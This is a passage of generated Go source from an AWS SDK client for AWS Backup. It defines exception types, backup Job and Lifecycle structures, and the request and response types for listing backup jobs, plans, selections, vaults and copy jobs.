// Code returns the exception type name.
func (s *InvalidParameterValueException) Code() string {
return "InvalidParameterValueException"
}
// Message returns the exception's message.
func (s *InvalidParameterValueException) Message() string {
if s.Message_ != nil {
return *s.Message_
}
return ""
}
// OrigErr always returns nil, satisfies awserr.Error interface.
func (s *InvalidParameterValueException) OrigErr() error {
return nil
}
func (s *InvalidParameterValueException) Error() string {
return fmt.Sprintf("%s: %s\n%s", s.Code(), s.Message(), s.String())
}
// Status code returns the HTTP status code for the request's response error.
func (s *InvalidParameterValueException) StatusCode() int {
return s.RespMetadata.StatusCode
}
// RequestID returns the service's response RequestID for request.
func (s *InvalidParameterValueException) RequestID() string {
return s.RespMetadata.RequestID
}
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
type InvalidRequestException struct {
_ struct{} `type:"structure"`
RespMetadata protocol.ResponseMetadata `json:"-" xml:"-"`
Code_ *string `locationName:"Code" type:"string"`
Context *string `type:"string"`
Message_ *string `locationName:"Message" type:"string"`
Type *string `type:"string"`
}
// String returns the string representation
func (s InvalidRequestException) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s InvalidRequestException) GoString() string {
return s.String()
}
func newErrorInvalidRequestException(v protocol.ResponseMetadata) error {
return &InvalidRequestException{
RespMetadata: v,
}
}
// Code returns the exception type name.
func (s *InvalidRequestException) Code() string {
return "InvalidRequestException"
}
// Message returns the exception's message.
func (s *InvalidRequestException) Message() string {
if s.Message_ != nil {
return *s.Message_
}
return ""
}
// OrigErr always returns nil, satisfies awserr.Error interface.
func (s *InvalidRequestException) OrigErr() error {
return nil
}
func (s *InvalidRequestException) Error() string {
return fmt.Sprintf("%s: %s\n%s", s.Code(), s.Message(), s.String())
}
// Status code returns the HTTP status code for the request's response error.
func (s *InvalidRequestException) StatusCode() int {
return s.RespMetadata.StatusCode
}
// RequestID returns the service's response RequestID for request.
func (s *InvalidRequestException) RequestID() string {
return s.RespMetadata.RequestID
}
// AWS Backup is already performing an action on this recovery point. It can't
// perform the action you requested until the first action finishes. Try again
// later.
type InvalidResourceStateException struct {
_ struct{} `type:"structure"`
RespMetadata protocol.ResponseMetadata `json:"-" xml:"-"`
Code_ *string `locationName:"Code" type:"string"`
Context *string `type:"string"`
Message_ *string `locationName:"Message" type:"string"`
Type *string `type:"string"`
}
// String returns the string representation
func (s InvalidResourceStateException) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s InvalidResourceStateException) GoString() string {
return s.String()
}
func newErrorInvalidResourceStateException(v protocol.ResponseMetadata) error {
return &InvalidResourceStateException{
RespMetadata: v,
}
}
// Code returns the exception type name.
func (s *InvalidResourceStateException) Code() string {
return "InvalidResourceStateException"
}
// Message returns the exception's message.
func (s *InvalidResourceStateException) Message() string {
if s.Message_ != nil {
return *s.Message_
}
return ""
}
// OrigErr always returns nil, satisfies awserr.Error interface.
func (s *InvalidResourceStateException) OrigErr() error {
return nil
}
func (s *InvalidResourceStateException) Error() string {
return fmt.Sprintf("%s: %s\n%s", s.Code(), s.Message(), s.String())
}
// Status code returns the HTTP status code for the request's response error.
func (s *InvalidResourceStateException) StatusCode() int {
return s.RespMetadata.StatusCode
}
// RequestID returns the service's response RequestID for request.
func (s *InvalidResourceStateException) RequestID() string {
return s.RespMetadata.RequestID
}
// Contains detailed information about a backup job.
type Job struct {
_ struct{} `type:"structure"`
// The account ID that owns the backup job.
AccountId *string `type:"string"`
// Uniquely identifies a request to AWS Backup to back up a resource.
BackupJobId *string `type:"string"`
// Specifies the backup option for a selected resource. This option is only
// available for Windows VSS backup jobs.
//
// Valid values: Set to "WindowsVSS”:“enabled" to enable WindowsVSS backup
// option and create a VSS Windows backup. Set to “WindowsVSS”:”disabled”
// to create a regular backup. If you specify an invalid option, you get an
// InvalidParameterValueException exception.
BackupOptions map[string]*string `type:"map"`
// The size, in bytes, of a backup.
BackupSizeInBytes *int64 `type:"long"`
// Represents the type of backup for a backup job.
BackupType *string `type:"string"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup vault; for
// example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
BackupVaultName *string `type:"string"`
// The size in bytes transferred to a backup vault at the time that the job
// status was queried.
BytesTransferred *int64 `type:"long"`
// The date and time a job to create a backup job is completed, in Unix format
// and Coordinated Universal Time (UTC). The value of CompletionDate is accurate
// to milliseconds. For example, the value 1516925490.087 represents Friday,
// January 26, 2018 12:11:30.087 AM.
CompletionDate *time.Time `type:"timestamp"`
// Contains identifying information about the creation of a backup job, including
// the BackupPlanArn, BackupPlanId, BackupPlanVersion, and BackupRuleId of the
// backup plan used to create it.
CreatedBy *RecoveryPointCreator `type:"structure"`
// The date and time a backup job is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// The date and time a job to back up resources is expected to be completed,
// in Unix format and Coordinated Universal Time (UTC). The value of ExpectedCompletionDate
// is accurate to milliseconds. For example, the value 1516925490.087 represents
// Friday, January 26, 2018 12:11:30.087 AM.
ExpectedCompletionDate *time.Time `type:"timestamp"`
// Specifies the IAM role ARN used to create the target recovery point. IAM
// roles other than the default role must include either AWSBackup or AwsBackup
// in the role name. For example, arn:aws:iam::123456789012:role/AWSBackupRDSAccess.
// Role names without those strings lack permissions to perform backup jobs.
IamRoleArn *string `type:"string"`
// Contains an estimated percentage complete of a job at the time the job status
// was queried.
PercentDone *string `type:"string"`
// An ARN that uniquely identifies a recovery point; for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
// An ARN that uniquely identifies a resource. The format of the ARN depends
// on the resource type.
ResourceArn *string `type:"string"`
// The type of AWS resource to be backed up; for example, an Amazon Elastic
// Block Store (Amazon EBS) volume or an Amazon Relational Database Service
// (Amazon RDS) database. For VSS Windows backups, the only supported resource
// type is Amazon EC2.
ResourceType *string `type:"string"`
// Specifies the time in Unix format and Coordinated Universal Time (UTC) when
// a backup job must be started before it is canceled. The value is calculated
// by adding the start window to the scheduled time. So if the scheduled time
// were 6:00 PM and the start window is 2 hours, the StartBy time would be 8:00
// PM on the date specified. The value of StartBy is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
StartBy *time.Time `type:"timestamp"`
// The current state of a resource recovery point.
State *string `type:"string" enum:"JobState"`
// A detailed message explaining the status of the job to back up a resource.
StatusMessage *string `type:"string"`
}
// String returns the string representation
func (s Job) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s Job) GoString() string {
return s.String()
}
// SetAccountId sets the AccountId field's value.
func (s *Job) SetAccountId(v string) *Job {
s.AccountId = &v
return s
}
// SetBackupJobId sets the BackupJobId field's value.
func (s *Job) SetBackupJobId(v string) *Job {
s.BackupJobId = &v
return s
}
// SetBackupOptions sets the BackupOptions field's value.
func (s *Job) SetBackupOptions(v map[string]*string) *Job {
s.BackupOptions = v
return s
}
// SetBackupSizeInBytes sets the BackupSizeInBytes field's value.
func (s *Job) SetBackupSizeInBytes(v int64) *Job {
s.BackupSizeInBytes = &v
return s
}
// SetBackupType sets the BackupType field's value.
func (s *Job) SetBackupType(v string) *Job {
s.BackupType = &v
return s
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *Job) SetBackupVaultArn(v string) *Job {
s.BackupVaultArn = &v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *Job) SetBackupVaultName(v string) *Job {
s.BackupVaultName = &v
return s
}
// SetBytesTransferred sets the BytesTransferred field's value.
func (s *Job) SetBytesTransferred(v int64) *Job {
s.BytesTransferred = &v
return s
}
// SetCompletionDate sets the CompletionDate field's value.
func (s *Job) SetCompletionDate(v time.Time) *Job {
s.CompletionDate = &v
return s
}
// SetCreatedBy sets the CreatedBy field's value.
func (s *Job) SetCreatedBy(v *RecoveryPointCreator) *Job {
s.CreatedBy = v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *Job) SetCreationDate(v time.Time) *Job {
s.CreationDate = &v
return s
}
// SetExpectedCompletionDate sets the ExpectedCompletionDate field's value.
func (s *Job) SetExpectedCompletionDate(v time.Time) *Job {
s.ExpectedCompletionDate = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *Job) SetIamRoleArn(v string) *Job {
s.IamRoleArn = &v
return s
}
// SetPercentDone sets the PercentDone field's value.
func (s *Job) SetPercentDone(v string) *Job {
s.PercentDone = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *Job) SetRecoveryPointArn(v string) *Job {
s.RecoveryPointArn = &v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *Job) SetResourceArn(v string) *Job {
s.ResourceArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *Job) SetResourceType(v string) *Job {
s.ResourceType = &v
return s
}
// SetStartBy sets the StartBy field's value.
func (s *Job) SetStartBy(v time.Time) *Job {
s.StartBy = &v
return s
}
// SetState sets the State field's value.
func (s *Job) SetState(v string) *Job {
s.State = &v
return s
}
// SetStatusMessage sets the StatusMessage field's value.
func (s *Job) SetStatusMessage(v string) *Job {
s.StatusMessage = &v
return s
}
// Contains an array of Transition objects specifying how long in days before
// a recovery point transitions to cold storage or is deleted.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, on the console, the “expire after days”
// setting must be 90 days greater than the “transition to cold after days”
// setting. The “transition to cold after days” setting cannot be changed
// after a backup has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
type Lifecycle struct {
_ struct{} `type:"structure"`
// Specifies the number of days after creation that a recovery point is deleted.
// Must be greater than 90 days plus MoveToColdStorageAfterDays.
DeleteAfterDays *int64 `type:"long"`
// Specifies the number of days after creation that a recovery point is moved
// to cold storage.
MoveToColdStorageAfterDays *int64 `type:"long"`
}
// String returns the string representation
func (s Lifecycle) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s Lifecycle) GoString() string {
return s.String()
}
// SetDeleteAfterDays sets the DeleteAfterDays field's value.
func (s *Lifecycle) SetDeleteAfterDays(v int64) *Lifecycle {
s.DeleteAfterDays = &v
return s
}
// SetMoveToColdStorageAfterDays sets the MoveToColdStorageAfterDays field's value.
func (s *Lifecycle) SetMoveToColdStorageAfterDays(v int64) *Lifecycle {
s.MoveToColdStorageAfterDays = &v
return s
}
// A limit in the request has been exceeded; for example, a maximum number of
// items allowed in a request.
type LimitExceededException struct {
_ struct{} `type:"structure"`
RespMetadata protocol.ResponseMetadata `json:"-" xml:"-"`
Code_ *string `locationName:"Code" type:"string"`
Context *string `type:"string"`
Message_ *string `locationName:"Message" type:"string"`
Type *string `type:"string"`
}
// String returns the string representation
func (s LimitExceededException) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s LimitExceededException) GoString() string {
return s.String()
}
func newErrorLimitExceededException(v protocol.ResponseMetadata) error {
return &LimitExceededException{
RespMetadata: v,
}
}
// Code returns the exception type name.
func (s *LimitExceededException) Code() string {
return "LimitExceededException"
}
// Message returns the exception's message.
func (s *LimitExceededException) Message() string {
if s.Message_ != nil {
return *s.Message_
}
return ""
}
// OrigErr always returns nil, satisfies awserr.Error interface.
func (s *LimitExceededException) OrigErr() error {
return nil
}
func (s *LimitExceededException) Error() string {
return fmt.Sprintf("%s: %s\n%s", s.Code(), s.Message(), s.String())
}
// Status code returns the HTTP status code for the request's response error.
func (s *LimitExceededException) StatusCode() int {
return s.RespMetadata.StatusCode
}
// RequestID returns the service's response RequestID for request.
func (s *LimitExceededException) RequestID() string {
return s.RespMetadata.RequestID
}
type ListBackupJobsInput struct {
_ struct{} `type:"structure"`
// The account ID to list the jobs from. Returns only backup jobs associated
// with the specified account ID.
//
// If used from an AWS Organizations management account, passing * returns all
// jobs across the organization.
ByAccountId *string `location:"querystring" locationName:"accountId" type:"string"`
// Returns only backup jobs that will be stored in the specified backup vault.
// Backup vaults are identified by names that are unique to the account used
// to create them and the AWS Region where they are created. They consist of
// lowercase letters, numbers, and hyphens.
ByBackupVaultName *string `location:"querystring" locationName:"backupVaultName" type:"string"`
// Returns only backup jobs that were created after the specified date.
ByCreatedAfter *time.Time `location:"querystring" locationName:"createdAfter" type:"timestamp"`
// Returns only backup jobs that were created before the specified date.
ByCreatedBefore *time.Time `location:"querystring" locationName:"createdBefore" type:"timestamp"`
// Returns only backup jobs that match the specified resource Amazon Resource
// Name (ARN).
ByResourceArn *string `location:"querystring" locationName:"resourceArn" type:"string"`
// Returns only backup jobs for the specified resources:
//
// * DynamoDB for Amazon DynamoDB
//
// * EBS for Amazon Elastic Block Store
//
// * EC2 for Amazon Elastic Compute Cloud
//
// * EFS for Amazon Elastic File System
//
// * RDS for Amazon Relational Database Service
//
// * Aurora for Amazon Aurora
//
// * Storage Gateway for AWS Storage Gateway
ByResourceType *string `location:"querystring" locationName:"resourceType" type:"string"`
// Returns only backup jobs that are in the specified state.
ByState *string `location:"querystring" locationName:"state" type:"string" enum:"JobState"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListBackupJobsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupJobsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListBackupJobsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListBackupJobsInput"}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetByAccountId sets the ByAccountId field's value.
func (s *ListBackupJobsInput) SetByAccountId(v string) *ListBackupJobsInput {
s.ByAccountId = &v
return s
}
// SetByBackupVaultName sets the ByBackupVaultName field's value.
func (s *ListBackupJobsInput) SetByBackupVaultName(v string) *ListBackupJobsInput {
s.ByBackupVaultName = &v
return s
}
// SetByCreatedAfter sets the ByCreatedAfter field's value.
func (s *ListBackupJobsInput) SetByCreatedAfter(v time.Time) *ListBackupJobsInput {
s.ByCreatedAfter = &v
return s
}
// SetByCreatedBefore sets the ByCreatedBefore field's value.
func (s *ListBackupJobsInput) SetByCreatedBefore(v time.Time) *ListBackupJobsInput {
s.ByCreatedBefore = &v
return s
}
// SetByResourceArn sets the ByResourceArn field's value.
func (s *ListBackupJobsInput) SetByResourceArn(v string) *ListBackupJobsInput {
s.ByResourceArn = &v
return s
}
// SetByResourceType sets the ByResourceType field's value.
func (s *ListBackupJobsInput) SetByResourceType(v string) *ListBackupJobsInput {
s.ByResourceType = &v
return s
}
// SetByState sets the ByState field's value.
func (s *ListBackupJobsInput) SetByState(v string) *ListBackupJobsInput {
s.ByState = &v
return s
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListBackupJobsInput) SetMaxResults(v int64) *ListBackupJobsInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupJobsInput) SetNextToken(v string) *ListBackupJobsInput {
s.NextToken = &v
return s
}
type ListBackupJobsOutput struct {
_ struct{} `type:"structure"`
// An array of structures containing metadata about your backup jobs returned
// in JSON format.
BackupJobs []*Job `type:"list"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
}
// String returns the string representation
func (s ListBackupJobsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupJobsOutput) GoString() string {
return s.String()
}
// SetBackupJobs sets the BackupJobs field's value.
func (s *ListBackupJobsOutput) SetBackupJobs(v []*Job) *ListBackupJobsOutput {
s.BackupJobs = v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupJobsOutput) SetNextToken(v string) *ListBackupJobsOutput {
s.NextToken = &v
return s
}
type ListBackupPlanTemplatesInput struct {
_ struct{} `type:"structure"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListBackupPlanTemplatesInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupPlanTemplatesInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListBackupPlanTemplatesInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListBackupPlanTemplatesInput"}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListBackupPlanTemplatesInput) SetMaxResults(v int64) *ListBackupPlanTemplatesInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupPlanTemplatesInput) SetNextToken(v string) *ListBackupPlanTemplatesInput {
s.NextToken = &v
return s
}
type ListBackupPlanTemplatesOutput struct {
_ struct{} `type:"structure"`
// An array of template list items containing metadata about your saved templates.
BackupPlanTemplatesList []*PlanTemplatesListMember `type:"list"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
}
// String returns the string representation
func (s ListBackupPlanTemplatesOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupPlanTemplatesOutput) GoString() string {
return s.String()
}
// SetBackupPlanTemplatesList sets the BackupPlanTemplatesList field's value.
func (s *ListBackupPlanTemplatesOutput) SetBackupPlanTemplatesList(v []*PlanTemplatesListMember) *ListBackupPlanTemplatesOutput {
s.BackupPlanTemplatesList = v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupPlanTemplatesOutput) SetNextToken(v string) *ListBackupPlanTemplatesOutput {
s.NextToken = &v
return s
}
type ListBackupPlanVersionsInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
//
// BackupPlanId is a required field
BackupPlanId *string `location:"uri" locationName:"backupPlanId" type:"string" required:"true"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListBackupPlanVersionsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupPlanVersionsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListBackupPlanVersionsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListBackupPlanVersionsInput"}
if s.BackupPlanId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanId"))
}
if s.BackupPlanId != nil && len(*s.BackupPlanId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanId", 1))
}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *ListBackupPlanVersionsInput) SetBackupPlanId(v string) *ListBackupPlanVersionsInput {
s.BackupPlanId = &v
return s
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListBackupPlanVersionsInput) SetMaxResults(v int64) *ListBackupPlanVersionsInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupPlanVersionsInput) SetNextToken(v string) *ListBackupPlanVersionsInput {
s.NextToken = &v
return s
}
type ListBackupPlanVersionsOutput struct {
_ struct{} `type:"structure"`
// An array of version list items containing metadata about your backup plans.
BackupPlanVersionsList []*PlansListMember `type:"list"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
}
// String returns the string representation
func (s ListBackupPlanVersionsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupPlanVersionsOutput) GoString() string {
return s.String()
}
// SetBackupPlanVersionsList sets the BackupPlanVersionsList field's value.
func (s *ListBackupPlanVersionsOutput) SetBackupPlanVersionsList(v []*PlansListMember) *ListBackupPlanVersionsOutput {
s.BackupPlanVersionsList = v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupPlanVersionsOutput) SetNextToken(v string) *ListBackupPlanVersionsOutput {
s.NextToken = &v
return s
}
type ListBackupPlansInput struct {
_ struct{} `type:"structure"`
// A Boolean value with a default value of FALSE that returns deleted backup
// plans when set to TRUE.
IncludeDeleted *bool `location:"querystring" locationName:"includeDeleted" type:"boolean"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListBackupPlansInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupPlansInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListBackupPlansInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListBackupPlansInput"}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetIncludeDeleted sets the IncludeDeleted field's value.
func (s *ListBackupPlansInput) SetIncludeDeleted(v bool) *ListBackupPlansInput {
s.IncludeDeleted = &v
return s
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListBackupPlansInput) SetMaxResults(v int64) *ListBackupPlansInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupPlansInput) SetNextToken(v string) *ListBackupPlansInput {
s.NextToken = &v
return s
}
type ListBackupPlansOutput struct {
_ struct{} `type:"structure"`
// An array of backup plan list items containing metadata about your saved backup
// plans.
BackupPlansList []*PlansListMember `type:"list"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
}
// String returns the string representation
func (s ListBackupPlansOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupPlansOutput) GoString() string {
return s.String()
}
// SetBackupPlansList sets the BackupPlansList field's value.
func (s *ListBackupPlansOutput) SetBackupPlansList(v []*PlansListMember) *ListBackupPlansOutput {
s.BackupPlansList = v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupPlansOutput) SetNextToken(v string) *ListBackupPlansOutput {
s.NextToken = &v
return s
}
type ListBackupSelectionsInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
//
// BackupPlanId is a required field
BackupPlanId *string `location:"uri" locationName:"backupPlanId" type:"string" required:"true"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListBackupSelectionsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupSelectionsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListBackupSelectionsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListBackupSelectionsInput"}
if s.BackupPlanId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanId"))
}
if s.BackupPlanId != nil && len(*s.BackupPlanId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanId", 1))
}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *ListBackupSelectionsInput) SetBackupPlanId(v string) *ListBackupSelectionsInput {
s.BackupPlanId = &v
return s
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListBackupSelectionsInput) SetMaxResults(v int64) *ListBackupSelectionsInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupSelectionsInput) SetNextToken(v string) *ListBackupSelectionsInput {
s.NextToken = &v
return s
}
type ListBackupSelectionsOutput struct {
_ struct{} `type:"structure"`
// An array of backup selection list items containing metadata about each resource
// in the list.
BackupSelectionsList []*SelectionsListMember `type:"list"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
}
// String returns the string representation
func (s ListBackupSelectionsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupSelectionsOutput) GoString() string {
return s.String()
}
// SetBackupSelectionsList sets the BackupSelectionsList field's value.
func (s *ListBackupSelectionsOutput) SetBackupSelectionsList(v []*SelectionsListMember) *ListBackupSelectionsOutput {
s.BackupSelectionsList = v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupSelectionsOutput) SetNextToken(v string) *ListBackupSelectionsOutput {
s.NextToken = &v
return s
}
type ListBackupVaultsInput struct {
_ struct{} `type:"structure"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListBackupVaultsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupVaultsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListBackupVaultsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListBackupVaultsInput"}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListBackupVaultsInput) SetMaxResults(v int64) *ListBackupVaultsInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupVaultsInput) SetNextToken(v string) *ListBackupVaultsInput {
s.NextToken = &v
return s
}
type ListBackupVaultsOutput struct {
_ struct{} `type:"structure"`
// An array of backup vault list members containing vault metadata, including
// Amazon Resource Name (ARN), display name, creation date, number of saved
// recovery points, and encryption information if the resources saved in the
// backup vault are encrypted.
BackupVaultList []*VaultListMember `type:"list"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
}
// String returns the string representation
func (s ListBackupVaultsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupVaultsOutput) GoString() string {
return s.String()
}
// SetBackupVaultList sets the BackupVaultList field's value.
func (s *ListBackupVaultsOutput) SetBackupVaultList(v []*VaultListMember) *ListBackupVaultsOutput {
s.BackupVaultList = v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupVaultsOutput) SetNextToken(v string) *ListBackupVaultsOutput {
s.NextToken = &v
return s
}
type ListCopyJobsInput struct {
_ struct{} `type:"structure"`
// The account ID to list the jobs from. Returns only copy jobs associated with
// the specified account ID.
ByAccountId *string `location:"querystring" locationName:"accountId" type:"string"`
// Returns only copy jobs that were created after the specified date.
ByCreatedAfter *time.Time `location:"querystring" locationName:"createdAfter" type:"timestamp"`
// Returns only copy jobs that were created before the specified date.
ByCreatedBefore *time.Time `location:"querystring" locationName:"createdBefore" type:"timestamp"`
// An Amazon Resource Name (ARN) that uniquely identifies a source backup vault
// to copy from; for example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
ByDestinationVaultArn *string `location:"querystring" locationName:"destinationVaultArn" type:"string"`
// Returns only copy jobs that match the specified resource Amazon Resource
// Name (ARN).
ByResourceArn *string `location:"querystring" locationName:"resourceArn" type:"string"`
// Returns only backup jobs for the specified resources:
//
// * DynamoDB for Amazon DynamoDB
//
// * EBS for Amazon Elastic Block Store
//
// * EC2 for Amazon Elastic Compute Cloud
//
// * EFS for Amazon Elastic File System
//
// * RDS for Amazon Relational Database Service
//
// * Aurora for Amazon Aurora
//
// * Storage Gateway for AWS Storage Gateway
ByResourceType *string `location:"querystring" locationName:"resourceType" type:"string"`
// Returns only copy jobs that are in the specified state.
ByState *string `location:"querystring" locationName:"state" type:"string" enum:"CopyJobState"`
// The maximum number of items to be returned.
